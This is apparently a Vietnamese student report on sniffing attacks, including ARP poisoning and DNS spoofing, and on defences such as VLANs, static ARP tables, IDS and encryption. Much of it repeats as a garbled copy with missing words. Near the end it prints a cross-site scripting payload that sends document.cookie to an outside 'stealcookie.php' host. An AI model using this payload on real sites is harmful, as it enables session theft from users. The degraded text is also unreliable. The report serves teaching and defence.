Đang tải... (xem toàn văn)
1.3. Mục tiêu của báo cáo Với sự phát triển mạnh mẽ của mạng máy tính hiện nay, nhu cầu sử dụng mạng cho việc trao đổi và chia sẻ thông tin là rất lớn. Tuy nhiên, đi song song với việc đó thì an ninh mạng luôn là một nỗi lo khi các hình thức tấn công mạng ngày một nhiều và ngày càng trở nên tinh vi hơn. Do vậy việc nghiên cứu về các phương pháp tấn công mạng và cách phòng chống là điều tất yếu. Bài báo cáo “NGHIÊN CỨU CÁC PHƯƠNG PHÁP TẤN CÔNG SNIFFER” được thực hiện nhằm tìm hiểu về các kiểu tấn công phổ biến trên mạng. Cụ thể, bài báo cáo sẽ đi sâu vào nghiên cứu phương pháp tấn công sniffing và cách phòng chống. Mục tiêu đề ra là: Tìm hiểu một số kiểu tấn công phổ biến trên mạng. Tìm hiểu phương pháp tấn công sniffing. Cách phòng chống tấn công sniffing. CHƯƠNG 2: PHƯƠNG PHÁP TẤN CÔNG SNIFFING VÀ CÁCH PHÒNG CHỐNG 2.1. Giới thiệu 2.1.1. Khái niệm sniffing Sniffing là một hình thức nghe lén trên hệ thống mạng dựa trên những đặc điểm của cơ chế TCPIP. Người nghe lén để thiết bị lắng nghe giữa mạng mang thông tin như hai thiết bị điện thoại hoặc hai thiết bị đầu cuối trên internet. Nghe lén được sử dụng như công cụ để các nhà quản trị mạng theo dõi, bảo trì hệ thống mạng và có thể kiểm tra các dữ liệu ra vào mạng. Về mặt tiêu cực, nó được sử dụng với mục đích nghe lén các thông tin trên mạng để lấy các thông tin quan trọng. 2.1.2. Cơ chế hoạt động của sniffing Những giao dịch giữa các hệ thống mạng máy tính thường là những dữ liệu ở dạng nhị phân. Bởi vậy để hiểu được những dữ liệu này, các chương trình nghe lén phải có tính năng phân tích các nghi thức, cũng như tính năng giải mã các dữ liệu ở dạng nhị phân để hiểu được chúng. Hình 2.1: Cơ chế hoạt động của sniffing Trong môi trường Hub: Một khung gói tin khi chuyển từ máy A sang máy B thì đồng thời nó gửi đến tất cả các máy khác đang kết nối cùng Hub theo cơ chế loan tin (broadcast). Các máy khác nhận được gói tin này sẽ tiến hành so sánh yêu cầu về địa chỉ MAC của frame gói tin với địa chỉ đích. Nếu trùng lập thì sẽ nhận, còn không thì cho qua. Do gói tin từ A được gửi đến B nên khi so sánh thì chỉ có B mới giống địa chỉ đích đến nên chỉ có B mới thực hiện tiếp nhận. Dựa vào nguyên tắc đó, máy được cài đặt chương trình nghe trộm sẽ “tự nhận” bất cứ gói tin được lưu chuyển trong mạng qua Hub, kể cả khi đích đến gói tin có đích đến không phải là nó, do sniffer chuyển card mạng của máy sang chế độ hỗn tạp (promiscuous mode). Promiscuous mode là chế độ đặc biệt. Khi card mạng được đặt dưới chế độ này, nó có thể nhận tất cả các gói tin mà không bị ràng buộc kiểm tra địa chỉ đích đến. Trong môi trường Switch: Khác với Hub, Switch chỉ chuyển tải các gói tin đến những địa chỉ cổng xác định trong bảng chuyển mạch nên nghe trộm kiểu “tự nhận” như ở Hub không thực hiện được. Tuy nhiên, kẻ tấn công có thể dùng các cơ chế khác để tấn công trong môi trường Switch như ARP spoofing, MAC spoofing, MAC duplicating, DNS spoofing, v.v… 2.1.3. Phân loại sniffing Passive sniffing: Chủ yếu hoạt động trong môi trường không có các thiết bị chuyển mạch gói, phổ biến hiện nay là các dạng mạng sử dụng Hub. Do không có các thiết bị chuyển mạch gói nên các gói tin được broadcast đi trong mạng. Chính vì vậy, việc thực hiện sniffing là khá đơn giản. Kẻ tấn công không cần gửi ra gói tin giả mạo nào, chỉ cần bắt các gói tin từ Port về (dù host nhận gói tin không phải là nơi đến của gói tin đó). Hình thức sniffing này rất khó phát hiện do các máy tự broadcast các gói tin. Ngày nay hình thức này thường ít được sử dụng do Hub không còn được ưa chuộng nhiều, thay vào đó là Switch. Active sniffing: Chủ yếu hoạt động trong môi trường có các thiết bị chuyển mạch gói, phổ biến hiện nay là các dạng mạch sử dụng Switch. Kẻ tấn công thực hiện sniffing dựa trên cơ chế ARP và RARP (2 cơ chế chuyển đổi từ IP sang MAC và từ MAC sang IP) bằng cách phát đi các gói tin đầu độc, mà cụ thể ở đây là phát đi các gói thông báo cho máy gửi gói tin là “tôi là người nhận” mặc không phải là “người nhận”. Ngoài ra, các sniffer còn có thể dùng phương pháp giả địa chỉ MAC, thay đổi MAC của bản thân thành MAC của một máy hợp lệ và qua được chức năng lọc MAC của thiết bị, qua đó ép dòng dữ liệu đi qua card mạng của mình. Tuy nhiên, do gói tin phải gửi đi nên sẽ chiếm băng thông. Nếu thực hiện sniffing quá nhiều máy trong mạng thì lượng gói tin gửi đi sẽ rất lớn (do liên tục gửi đi các gói tin giả mạo) có thể dẫn đến nghẽn mạng.
MỤC LỤC LỜI MỞ ĐẦU DANH MỤC HÌNH VẼ CHƯƠNG 1: GIỚI THIỆU 1.1 Tổng quan an ninh mạng nguy gây an ninh 1.2 Các kiểu công mạng phổ biến 1.3 Mục tiêu báo cáo 10 mạng CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG CHỐNG 12 2.1 Giới thiệu 12 2.1.1 Khái niệm sniffing .12 2.1.2 Cơ chế hoạt động sniffing 12 2.1.3 Phân loại sniffing .13 2.1.4 Các hình thức cơng .14 2.2 Lắng nghe thông tin qua Hub .14 2.2.1 Phương pháp công .14 2.4 Lắng nghe thông tin qua Span Port Switch 17 2.5 Lắng nghe thông tin qua Gateway 18 2.6 Chặn bắt thông tin dùng ARP – Poisoning 19 2.6.1 Cách thức hoạt động ARP poisoning 20 2.6.2 Các biện pháp phòng chống .22 2.7 Chặn bắt thông tin dùng DNS – Spoofing 23 2.7.1 Giao thức DNS 23 2.7.2 Phương pháp công DNS – Spoofing 24 2.7.3 Các biện pháp phòng chống DNS Spoofing 25 CHƯƠNG 3: DEMO MỘT SỐ PHƯƠNG PHÁP TẤN CÔNG SNIFFING 27 3.1 Mô hình minh họa 27 TÀI LIỆU THAM KHẢO 27 LỜI MỞ ĐẦU Theo thống kê tính tốn Cục An tồn thơng tin Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam (VNCERT) - Bộ TT&TT, năm 2016, Việt Nam phát 135.190 công mạng, tăng gấp lần so với năm 2015, có 10.276 công lừa đảo (Phishing), 47.135 công cài phần mềm độc hại (Malware) 77.779 công thay đổi giao diện (Deface) Trong đó, có 201 công thay đổi giao diện vào hệ thống có tên miền “.gov.vn” Riêng nửa đầu năm 2017, Trung tâm VNCERT ghi nhận 6.303 công mạng vào hệ thống thông tin Việt Nam, bao gồm 1.522 công lừa đảo, 3.792 công cài đặt phần mềm độc hại 989 công thay đổi giao diện Tổng số công mạng vào hệ thống thông tin sử dụng tên miền “.gov.vn” tháng đầu năm 2017 25 Các công diễn biến phức tạp, với số lượng công mạng vào quan, tổ chức, doanh nghiệp có chiều hướng tăng so với năm trước đây, công mạng vào hệ thống thông tin quan nhà nước doanh nghiệp lớn Bài báo cáo giới thiệu tổng quát phương pháp Hacker sử dụng để công mạng, nói cụ thể phương pháp cơng sniffing cách phòng chống Nội dung báo cáo gồm 03 chương: CHƯƠNG 1: GIỚI THIỆU CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG CHỐNG CHƯƠNG 3: DEMO PHƯƠNG PHÁP TẤN CƠNG SNIFFING DANH MỤC HÌNH VẼ Hình 2.1: Cơ chế hoạt động sniffing Hình 2.2.1: Lắng nghe thơng tin qua Hub Hình 2.2.2: Xung đột nhiều thiết bị truyền thông thời điểm Hình 2.3.1: Mơ hình cơng MITM Hình 2.4.1: Cơ chế hoạt động Span port Hình 2.5.1: Mơ hình làm việc Gateway Hình 2.6.1: Cách thức hoạt động ARP Hình 2.6.2: Chặn bắt thơng tin dùng ARP Poisoning Hình 2.7.1: Mơ hình cơng DNS – spoofing Hình 2.7.2: Tấn cơng giả mạo DNS sử dụng phương pháp ID Spoofing CHƯƠNG 1: GIỚI THIỆU 1.1 Tổng quan an ninh mạng nguy gây an ninh mạng Trong bối cảnh tiến trình hội nhập, vấn đề an ninh mạng bảo mật liệu trở nên quan tâm Khi sở hạ tầng công nghệ mạng ngày đáp ứng tốt, nhiên song song với việc thực trạng cơng mạng ngày gia tăng, vấn đề bảo mật trọng Không nhà cung cấp dịch vụ Internet, quan phủ mà doanh nghiệp, tổ chức có ý thức an tồn thơng tin Bảo mật hay an tồn thơng tin bảo vệ thông tin trước mối đe dọa "thơng tin lộ", "thơng tin khơng cịn tồn vẹn" "thơng tin khơng sẵn sàng" Ngồi ra, cịn bảo vệ chống lại nguy an tồn thơng tin "nguy hiểm", "thiệt hại", "mất mát" tội phạm khác Bảo mật hình thức mức độ bảo vệ thơng tin bao gồm "cấu trúc" "q trình xử lý" để nâng cao bảo mật Các nguyên tắc tảng an ninh mạng: Tính bí mật: Là ngăn ngừa việc tiết lộ trái phép thông tin quan trọng, nhạy cảm Đó khả đảm bảo mức độ bí mật cần thiết tuân thủ thơng tin quan trọng, nhạy cảm che giấu với người dùng không cấp phép Đối với an ninh mạng tính bí mật rõ ràng điều nói đến thường xuyên bị cơng Tính tồn vẹn: Là phát ngăn ngừa việc sửa đổi trái phép liệu, thông tin hệ thống, đảm bảo xác thơng tin hệ thống Có ba mục đích việc đảm bảo tính tồn vẹn: - Ngăn cản làm biến dạng nội dung thông tin người sử dụng không phép - Ngăn cản làm biến dạng nội dung thông tin không phép không chủ tâm người sử dụng phép - Duy trì tồn vẹn liệu nội bên ngồi Tính sẵn sàng: Bảo đảm người sử dụng hợp pháp hệ thống có khả 1.2 truy cập lúc không bị ngắt quãng tới thông tin hệ thống tới mạng Tính sẵn sàng có liên quan đến độ tin cậy hệ thống Các kiểu công mạng phổ biến Có nhiều kiểu cơng mạng để xâm nhập vào hệ thống máy tính, phổ biến thường kiểu công sau đây: Tấn công trực tiếp: Những công trực tiếp thông thường sử dụng giai đoạn đầu để chiếm quyền truy nhập bên Một phương pháp cơng cổ điển dị tìm tên người sử dụng mật Đây phương pháp đơn giản, dễ thực khơng địi hỏi điều kiện đặc biệt để bắt đầu Kẻ cơng sử dụng thông tin tên người dùng, ngày sinh, địa chỉ, số nhà…để đoán mật Trong trường hợp có danh sách người sử dụng thơng tin mơi trường làm việc, có chương trình tự động hố việc dị tìm mật Trong số trường hợp phương pháp cho phép kẻ cơng có quyền người quản trị hệ thống (root hay administrator) Hai chương trình thường dùng cho phương pháp chương trình Sendmail Rlogin hệ thống Unix Sendmail chương trình phức tạp với mã nguồn bao gồm hàng ngàn dòng lệnh C Sendmail chạy với quyền người quản trị hệ thống chương trình phải có quyền ghi vào hộp thư người sử dụng Vì Sendmail nhận trực tiếp yêu cầu mạng thư tín bên ngồi nên trở thành nguồn cung cấp lỗ hổng bảo mật để truy cập hệ thống Rlogin cho phép người sử dụng từ máy mạng truy cập từ xa vào máy khác sử dụng tài nguyên máy Trong trình nhập tên mật người sử dụng, rlogin không kiểm tra độ dài dịng nhập nên ta đưa vào xâu lệnh tính tốn trước để ghi đè lên mã chương trình Rlogin, từ chiếm quyền truy cập Nghe trộm: Việc nghe trộm thơng tin mạng đưa lại thơng tin có ích tên, mật người sử dụng, thông tin mật chuyển qua mạng Việc nghe trộm thường tiến hành sau kẻ công chiếm quyền truy nhập hệ thống, thông qua chương trình cho phép đưa card giao tiếp mạng (Network Interface Card-NIC) vào chế độ nhận toàn thông tin lưu truyền mạng Những thông tin dễ dàng lấy Internet Giả mạo địa chỉ: Việc giả mạo địa IP thực thơng qua việc sử dụng khả dẫn đường trực tiếp (source-routing) Với cách cơng này, kẻ cơng gửi gói tin IP tới mạng bên với địa IP giả mạo (thông thường địa mạng máy coi an toàn mạng bên trong), đồng thời rõ đường dẫn mà gói tin IP phải gửi Vơ hiệu chức hệ thống: Đây kiểu cơng nhằm tê liệt hệ thống, khơng cho thực chức mà thiết kế Kiểu công ngăn chặn được, phương tiện tổ chức cơng phương tiện để làm việc truy nhập thông tin mạng Ví dụ sử dụng lệnh ping với tốc độ cao có thể, buộc hệ thống tiêu hao tồn tốc độ tính tốn khả mạng để trả lời lệnh này, khơng cịn tài ngun để thực cơng việc có ích khác Sử dụng lỗi người quản trị hệ thống: Đây kiểu công kẻ đột nhập, nhiên lỗi người quản trị hệ thống thường tạo lỗ hổng cho phép kẻ công sử dụng để truy nhập vào mạng nội Tấn công vào yếu tố người: Kẻ cơng liên lạc với người quản trị hệ thống, giả làm người sử dụng để yêu cầu thay đổi mật khẩu, thay đổi quyền truy nhập hệ thống, chí thay đổi số cấu hình hệ thống để thực phương pháp công khác Với kiểu công không thiết bị ngăn chặn cách hữu hiệu, có cách giáo dục người sử dụng mạng nội yêu cầu bảo mật để đề cao cảnh giác với tượng đáng nghi Nói chung yếu tố người điểm yếu hệ thống bảo vệ nào, có giáo dục cộng với tinh thần hợp tác từ phía người sử dụng để nâng cao độ an toàn hệ thống bảo vệ 1.3 Mục tiêu báo cáo Với phát triển mạnh mẽ mạng máy tính nay, nhu cầu sử dụng mạng cho việc trao đổi chia sẻ thông tin lớn Tuy nhiên, song song với việc an ninh mạng ln nỗi lo hình thức cơng mạng ngày nhiều ngày trở nên tinh vi Do việc nghiên cứu phương pháp cơng mạng cách phịng chống điều tất yếu Bài báo cáo “NGHIÊN CỨU CÁC PHƯƠNG PHÁP TẤN CÔNG SNIFFER” thực nhằm tìm hiểu kiểu công phổ biến mạng Cụ thể, báo cáo sâu vào nghiên cứu phương pháp cơng sniffing cách phịng chống Mục tiêu đề là: Tìm hiểu số kiểu cơng phổ biến mạng Tìm hiểu phương pháp cơng sniffing Cách phịng chống cơng sniffing CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG CHỐNG 2.1 Giới thiệu 2.1.1 Khái niệm sniffing Sniffing hình thức nghe hệ thống mạng dựa đặc điểm chế TCP/IP Người nghe để thiết bị lắng nghe mạng mang thông tin hai thiết bị điện thoại hai thiết bị đầu cuối internet Nghe sử dụng công cụ để nhà quản trị mạng theo dõi, bảo trì hệ thống mạng kiểm tra liệu vào mạng Về mặt tiêu cực, sử dụng với mục đích nghe thông tin mạng để lấy thông tin quan trọng 2.1.2 Cơ chế hoạt động sniffing Những giao dịch hệ thống mạng máy tính thường liệu dạng nhị phân Bởi để hiểu liệu này, chương trình nghe phải có tính phân tích nghi thức, tính giải mã liệu dạng nhị phân để hiểu chúng Hình 2.1: Cơ chế hoạt động sniffing Trong môi trường Hub: Một khung gói tin chuyển từ máy A sang máy B đồng thời gửi đến tất máy khác kết nối Hub theo chế loan tin (broadcast) Các máy khác nhận gói tin tiến hành so sánh yêu cầu địa MAC frame gói tin với địa đích Nếu trùng lập nhận, cịn khơng cho qua Do gói tin từ A gửi đến B nên so 10 Tuyến đường [Gateway] bị nhiễm độc Ý tưởng giả mạo gói tin mang IP nguồn máy MAC nguồn máy khác Nút nhận thông báo khác biệt cập nhật bảng ARP Q trình cơng chi tiết giới thiệu kỹ phần bắt chặn thông tin ARP poisoning 2.6 Chặn bắt thông tin dùng ARP – Poisoning 2.6.1 Khái niệm nguyên tắc làm việc ARP mạng LAN Tầng Network mơ hình OSI sử dụng loại địa mang tính chất quy ước IP, IPX… Trên thực tế, card mạng (NIC) kết nối với theo địa MAC, địa cố định phần cứng Chính vậy, giao thức phân giải địa chỉ: Address Resolution Protocol (ARP) sử dụng để chuyển đổi dạng địa qua lại với Khi thiết bị mạng muốn biết địa MAC thiết bị mạng mà biết địa tầng network (IP, IPX…) gửi ARP request bao gồm địa MAC address địa IP thiết bị mà cần biết MAC address tồn miền broadcast Mỗi thiết bị nhận request so sánh địa IP request với địa tầng network Nếu trùng địa thiết bị phải gửi ngược lại ARP reply cho thiết bị gửi ARP request (trong có chứa địa MAC mình) Lấy ví dụ hệ thống mạng đơn giản, PC A muốn gửi gói tin đến PC B biết địa IP PC B Khi PC A phải gửi ARP request broadcast cho toàn mạng để hỏi xem "địa MAC PC có địa IP gì?" Khi PC B nhận broadcast này, so sánh địa IP gói tin với địa IP Nhận thấy địa IP mình, PC B gửi lại gói tin ARP reply cho PC A, có chứa địa MAC B Sau PC A bắt đầu truyền gói tin cho B 17 Hình 2.6.1: Cách thức hoạt động ARP ARP giao thức phi trạng thái Máy chủ mạng tự động lưu trữ ARP reply mà chúng nhận được, máy khác có u cầu hay khơng Ngay mục ARP chưa hết hạn bị ghi đè nhận gói tin ARP reply Khơng có phương pháp giao thức ARP mà giúp máy xác nhận máy mà từ gói tin bắt nguồn Hành vi lỗ hổng cho phép ARP spoofing xảy 2.6.1 Cách thức hoạt động ARP poisoning Giao thức ARP vốn thiết kế nhằm mục đích tạo tính thuận tiện để trao đổi địa lớp thứ lớp thứ mơ hình OSI Lớp thứ hai, hay cịn gọi với tên khác tầng data-link, sử dụng địa MAC để thiết bị phần cứng thể giao tiếp với cách trực tiếp diện nhỏ Còn với lớp thứ 3, tên khác tầng network, lại sử dụng địa IP để tạo mạng với diện rộng để giao tiếp toàn cầu Tổ chức giao thức ARP vốn xoay quanh hai gói tin chính, ARP request ARP reply Mục đích gói tin request reply để định vị địa MAC thiết bị phần cứng tương ứng với địa IP mà gán cho Từ đó, luồng liệu truyền tới đích 18 mạng mà khơng bị thất lạc hay nhầm lẫn máy tính khác khơng u cầu gói tin Để hiểu tính chất request reply, ta hình dung đơn giản sau Gói request gửi cho thiết bị mạng phát thông điệp “Xin chào, địa IP X.X.X.X, địa MAC X:X:X:X:X:X Tôi cần gửi thứ đến máy có địa IP Y.Y.Y.Y, tiếc thay tơi khơng có địa MAC anh Vậy có địa IP tơi vừa nói vui lòng phản hồi kèm theo địa MAC anh để tơi trao gói tin này.” Lúc này, máy cần phản hồi đưa gói ARP reply với thơng điệp “Tơi người anh cần tìm Tơi có địa IP Y.Y.Y.Y MAC Y:Y:Y:Y:Y:Y” Khi q trình truyền giao gói tin hồn tất, thiết bị phát cập nhật bảng ARP cache hai thiết bị truyền thơng với Việc đầu độc gói tin ARP đánh vào yếu tố bất lợi không bảo mật giao thức ARP ban đầu Rõ ràng qua đoạn thấy tính bất cập gói ARP request reply Bất kỳ máy tính khơng phải mang địa Y.Y.Y.Y lấn quyền máy thật giả mạo mang IP đó, sau đem địa MAC cung cấp Bên request khơng có chế kiểm sốt chặt chẽ người đứng nhận, mà vào địa IP chấp nhận chuyển 19 Hình 2.6.2: Chặn bắt thông tin dùng ARP Poisoning Đặc biệt, giao thức ARP khơng giống DNS cấu hình để chấp nhận nâng cấp động (dynamic updates), thiết bị sử dụng giao thức ARP chấp nhận cập nhật lúc Điều có nghĩa thiết bị gửi gói ARP reply đến máy tính khác máy tính cập nhật vào bảng ARP cache giá trị Việc gửi gói ARP reply khơng có request tạo gọi việc gửi ARP “cho không” Khi ARP reply cho khơng đến máy tính gửi request, máy tính request nghĩ người tìm kiếm để truyền tin, nhiên thực chất họ lại bắt đầu thiết lập kết nối với kẻ xấu giả danh để thực cho việc công MITM 2.6.2 Các biện pháp phòng chống Ngày với phát triển phần mềm bảo mật đời giao thức HTTPS, ARP - Poisoning khơng cịn hiệu lúc trước Có thể kể đến vài biện pháp để phòng chống như: Bảo mật LAN Giả mạo ARP Cache kỹ thuật cơng mà sống sót cố gắng chặn lưu lượng hai thiết bị LAN Chỉ có lý đáng lo ngại vấn đề liệu thiết bị nội mạng có bị thỏa hiệp, cắm thiết bị không tin cậy vào mạng Mặc dù tập trung toàn cố gắng bảo mật lên phạm vi mạng việc phịng chống lại mối đe dọa từ bên việc có thái độ bảo mật bên tốt giúp ta loại trừ loại cơng Mã hóa ARP Cache Một cách bảo vệ chống lại vấn đề khơng an tồn vốn có ARP request ARP reply thực trình động Đây tùy chọn máy tính Windows cho phép ta bổ sung entry tĩnh vào ARP cache Trong trường hợp, nơi cấu hình mạng khơng thay đổi, ta hồn tồn tạo danh sách entry ARP tĩnh sử dụng chúng cho client thông qua kịch tự động Điều bảo đảm thiết bị dựa vào ARP cache nội chúng thay ARP request ARP reply Kiểm tra lưu lượng ARP với chương trình hãng thứ ba 20 Tùy chọn cuối cho việc phòng chống lại tượng giả mạo ARP cache phương pháp phản ứng có liên quan đến việc kiểm tra lưu lượng mạng thiết bị Ta thực điều với vài hệ thống phát xâm phạm (chẳng hạn Snort) thơng qua tiện ích thiết kế đặc biệt cho mục đích (như xARP) Điều khả thi ta quan tâm đến thiết bị đó, nhiên cồng kềnh vướng mắc việc giải với tồn đoạn mạng 2.7 Chặn bắt thơng tin dùng DNS – Spoofing 2.7.1 Giao thức DNS Giao thức DNS (Domain Name System – hệ thống phân giải tên miền) giao thức quan trọng dùng Internet, cho phép thiết lập tương ứng địa IP tên miền Mỗi website có tên (là tên miền hay đường dẫn URL) địa IP Khi mở trình duyệt Web nhập tên website, trình duyệt đến thẳng website mà không cần phải thông qua việc nhập địa IP trang web Quá trình "dịch" tên miền thành địa IP trình duyệt hiểu truy cập vào website công việc DNS server Các DNS trợ giúp qua lại với để dịch địa "IP" thành "tên" ngược lại Người sử dụng cần nhớ "tên", không cần phải nhớ địa IP (địa IP số khó nhớ) 2.7.2 Phương pháp cơng DNS – Spoofing DNS – spoofing kĩ thuật cung cấp thông tin DNS sai lệch cho host Khi người dùng yêu cầu truy cập đến địa website chuyển hướng, đưa người dùng tới địa giả mạo có hình thức giống với địa thật họ khơng hay biết bị lừa Kẻ công lấy cắp thông tin nhạy cảm người dùng, cài phần mềm độc hại, hay gây từ chối dịch vụ 21 Hình 2.7.1: Mơ hình cơng DNS - spoofing Một ví dụ, người dùng cần truy cập hộp thư điện tử địa www.mybank.com có địa IP X.X.X.X đó, kỹ thuật chuyển hướng yêu cầu sang trang giả mạo có địa IP Y.Y.Y.Y kẻ công dựng nên để chiếm đoạt tài khoản người dùng Có nhiều phương pháp triển khai kỹ thuật DNS Spoofing, đơn giản DNS ID Spoofing Mỗi truy vấn DNS gửi qua mạng có chứa số nhận dạng Mục đích số nhận dạng phân biệt truy vấn phản hồi chúng cách xác Để chặn truy vấn DNS gửi từ máy nạn nhân, kẻ công tạo gói giả mạo có chứa số nhận dạng để gói liệu chấp nhận máy nạn nhân Hình 2.7.2: Tấn cơng giả mạo DNS sử dụng phương pháp ID Spoofing 22 Quá trình công thực với hai bước Đầu tiên, tiến hành ARP Cache Poisoning thiết bị, mục đích để định tuyến lại lưu lượng qua host sử dụng để cơng mình, từ chặn yêu cầu DNS gửi gói liệu giả mạo để lừa nạn nhân truy cập vào website giả mạo kẻ công dựng nên thay vào thẳng website thức mà họ cố gắng truy cập 2.7.3 Các biện pháp phòng chống DNS Spoofing Tấn cơng DNS Spoofing khó để phịng chống có dấu hiệu cơng Nạn nhân khơng thể nhận bị chuyển hướng truy cập vào trang giả mạo thấy có bất thường tiến hành đăng nhập Hoặc kẻ công léo, nạn nhân nhận có điều khác thường lúc giao diện trang web Một số hướng phịng chống cơng DNS Spoofing: Bảo mật hệ thống máy tính bạn: Các dạng công thường xuất phát từ nội Nếu làm công tác bảo mật tốt từ yếu tố môi trường thật, yếu tố người việc bị lợi dụng để chuyển hướng DNS điều bất khả thi Tránh sử dụng DNS cho hệ thống bảo mật: Điều đồng nghĩa, mơi trường có chứa liệu nhạy cảm cơng ty, việc hạn chế sử dụng Internet, cấm truy cập mạng máy tính điều cần thiết Sử dụng IDS: Một dạng hệ thống phát dấu hiệu xâm nhập Khi đặt triển khai hệ thống ta, phát hình thức giả mạo ARP cache giả mạo DNS Sử dụng DNSSEC: DNSSEC giải pháp thay cho DNS, sử dụng ghi DNS có chữ ký (Signature) để bảo đảm hợp lệ hóa đáp trả truy vấn Giải pháp có triển khai định Cách phịng chống Phương pháp cơng Cách thức chủ yếu dùng phần mềm phát hoạt động chương trình nghe mạng AntiSniff, PromiScan, Promqry and PromqryUI, ARPwatch, Ettercap, v.v… Riêng với Ettercap (ettercap), chương 23 trình vừa dùng để nghe trộm, vừa có khả phát nghe trộm nhờ hỗ trợ plugin arp_cop (phát trạng thái ARP posioning);find_ettercap (phát trình ettercap khác chạy);scan_poisoner (phát máy thực posioning); seach_promisc (phát máy nghe trộm chế độ “hỗn tạp”),… – Dùng chương trình giám sát hoạt động mạng Thiết lập hệ thống phát xâm nhập IDS (Intrution Detection System) trình miễn phí Snort (Snort :: Home Page) nhằm phát tượng lạ mạng, có ARP spoofing, để có biện pháp đối phó thích hợp Nhìn chung, sử dụng phần mềm phát nghe trộm giải pháp nhanh thuận tiện người dùng cuối Tuy nhiên hạn chế lớn chương trình phát sau bị nghe – phát bị động nghe trộm xảy Vì đa phần chương trình chống dựa vào việc phát tình trạng Promiscuous (hỗn độn) ARP spoofing để cảnh báo tình trạng bị nghe trộm Dưới số giải pháp phòng chống – nên sử dụng kết hợp – Giới hạn mức độ phạm vi broadcast cách phân chia VLAN (Virtual Local Area Network); – Giới hạn khả bị cài đặt chương trình nghe cách áp dụng sách quản lý cài đặt phần mềm cho hệ thống Áp tính port security để hạn chế thiết bị mạng kết nối trái phép – Đối với mạng nhỏ, nên sử dụng địa IP tĩnh bảng ARP tĩnh để hạn chế khả bị công kiểu ARP spoofing thông qua giám sát chặt chẽ thay đổi địa MAC (Media Access Control) thiết bị switch – Áp dụng chế one-time password – thay đổi password liên tục – Mã hóa liệu truyền dẫn chế truyền thơng liệu an tồn SSL (Secure Sockets Layer), mạng riêng ảo VNP (Virtual Private Network) Nói cách khác thay hạn chế sử dụng giao thức truyền thơng khơng mã hóa liệu giao thức mã hóa Ví dụ: Dùng SSH (Secure Shell Host) thay cho Telnet/Rlogin; dùng SFTP (secure FTP) thay FTP; dùng Trillian (Trillian – IM, Astra, Windows Live, Facebook, Twitter, Yahoo, MySpace, AIM, Email, and more!) hay Jabber (http://jabber.org) làm chương trình chat; dùng HTTPS thay cho HTTP v.v… 24 ============================================= Để ngăn chăn kẻ công muốn Sniffer Password Bạn đồng thời sử dụng giao thức, phương pháp để mã hoá password sử dụng giải pháp chứng thực an toàn (Authentication): – SMB/CIFS: Trong mơi trường Windows/SAMBA bạn cần kích hoạt tính LANmanager Authencation – Keberos: Một giải pháp chứng thực liệu an toàn sử dụng Unix Windows: ftp://aeneas.mit.edu/pub/kerberos/doc/KERBEROS.FAQ – Stanford SRP (Secure Remote Password): Khắc phục nhược điểm khơng mã hố Password truyền thong giao thức FTP Telnet Unix:http://srp.stanford.edu/srp/ Mã hóa đường truyền a SSL (Secure Socket Layer) Một giao thức mã hoá phát triển cho hầu hết Webserver, Web Browser thông dụng SSL sử dụng để mã hố thơng tin nhạy cảm để gửi qua đường truyền : Số thẻ tin dụng khách hàng, password thông tin quan trọng.http://www.openssl.org/ http://www.modssl.org/ b PGP S/MIME E-mail có khả bị kẻ công ác ý Sniffer Khi Sniffer E-mail khơng mã hố, chúng khơng biết nội dung mail, mà chúng cịn biết thông tin địa người gửi, địa người nhận…Chính để đảm bảo an tồn tính riêng tư cho E-mail bạn cần phải mã hố chúng…S/MIME tích hợp hầu hết chương trình gửi nhận Mail Netscape Messenger, Outlock Express…PGP giao thức sủ dụng để mã hố E- mail Nó có khả hỗ trợ mã hố DSA, RSA lên đến 2048 bit liệu http://www.gnupg.org/ c OpenSSH Khi bạn sử dụng Telnet, FTP…2 giao thức chuẩn không cung cấp khả mã hoá liệu đường truyền Đặc biệt nguy hiểm 25 khơng mã hố Password, chúng gửi Password qua đường truyền dạng Clear Text Điều xảy liệu nhạy cảm bị Sniffer OpenSSH giao thức đời để khắc phục nhược điểm này: ssh (sử dụng thay Telnet), sftp (sử dụng thay FTP)… http://www.openssh.org/ d VPNs (Virtual Private Network) Được sử dụng để mã hoá liệu truyền thong Internet Tuy nhiên Hacker công thoả hiệp Node của kết nối VPN đó, chúng tiến hành Sniffer Một ví dụ đơn giản,là người dung Internet lướt Web sơ ý để nhiễm RAT (Remoto Access Trojan), thường loại Trojan thường có chứa sẵn Plugin Sniffer Cho đến người dùng bất cẩn thiết lập kết nối VPN Lúc Plugin Sniffer Trojan hoạt động có khả đọc liệu chưa mã hố trước đưa vào VPN Để phịng chống công kiểu này: bạn cần nâng cao ý thức cảnh giác cho người sử dụng hệ thống mạng VPN bạn, đồng thời sử dụng chương trình quét Virus để phát ngăn chặn không để hệ thống bị nhiễm Trojan Static ARP Table Rất nhiều điều xấu xảy có thành cơng thuốc độc bảng ARP máy tính mạng bạn làm để ngăn chặn cố gắng để đầu độc bảng ARP Một cách để ngăn chặn tác động xấu hành vi để tạo mục bảng ARP tĩnh cho tất thiết bị đoạn mạng địa phương bạn Khi điều thực hiện, hạt nhân bỏ qua tất câu trả lời ARP cho địa IP cụ thể sử dụng mục nhập sử dụng địa MAC định thay - Lỗ hổng XSS var a = new Image(); var a1 = “https://pentestethical.000webhost.com/ ”; var a2 = “ stealcookie.php?c=”; var a3 = document.cookie; a.src = a1 + a2 +a3 ; 26 ">document.location="https://pentestethic al.com/stealcookie.php?cookie=" + document.cookie;document.location="https://pentestet hical.com" IDS, IPS − IDS: phát xâm nhập − IPS: phát ngăn chặn xâm nhập Được chia làm loại chính: − HIDS (và IPS): triển khai máy trạm server quan trọng, để bảo vệ riêng máy − NIDS: đặt điểm quan trọng hệ thống mạng, để phát xâm nhập cho khu vực Cơng việc IDS/IPS: Nếu hoạt động theo kiểu nhận dạng mẫu packet so trùng packet với mẫu cơng mà có, trùng ==> loại packet công ==> cảnh báo ngăn cản Hiện đa số IDS/IPS hoạt động theo kiểu Tuy nhiên kiểu công IDS khơng nhận biết được, nên phải cập nhật lỗi thường xuyên giống cập nhật virus Nếu hoạt động theo kiểu heuristic thông minh (không biết dịch cho phải) IDS theo dõi mạng xem có tượng bất thường hay khơng, phản ứng lại Lợi điểm nhận biết kiểu công mới, nhiều trường hợp bị báo 